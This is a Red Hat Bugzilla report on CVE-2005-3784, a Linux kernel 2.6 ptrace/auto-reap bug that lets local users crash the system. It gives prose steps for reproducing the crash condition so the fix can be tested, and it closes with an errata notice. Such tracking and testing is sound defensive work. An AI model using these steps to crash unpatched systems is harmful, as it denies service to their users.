Red Hat Bugzilla – Bug 174078
[RHEL4] CVE-2005-3784 auto-reap DoS
Last modified: 2007-11-30 17:07:21 EST
The auto-reap of child processes in Linux kernel 2.6 before
2.6.15 includes processes with ptrace attached, which leads to
a dangling ptrace reference and allows local users to cause a
denial of service (crash).
Fixed upstream by
Created attachment 122347 [details]
I don't know of an existing test case unless one was posted on lkml.
The way to produce the situation is to have a real parent that has set SIGCHLD
to SIG_IGN, a child of that parent, a ptracer tracing the child, and then have
the child die (e.g. kill -9 it). The bug here means that the tracer will not
get a SIGCHLD, and the child will be reaped while the tracer is still attached.
Note that if the tracer is already blocked in a wait* syscall, it will be woken
up regardless of the bug, and so that might make it respond quickly enough to
mask the effects of the bug. So, do not test using a tracer already blocked in
wait* when the child dies; this is what the obvious sort of test using strace
will do, and it may not be sufficient to clearly diagnose the bug.
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.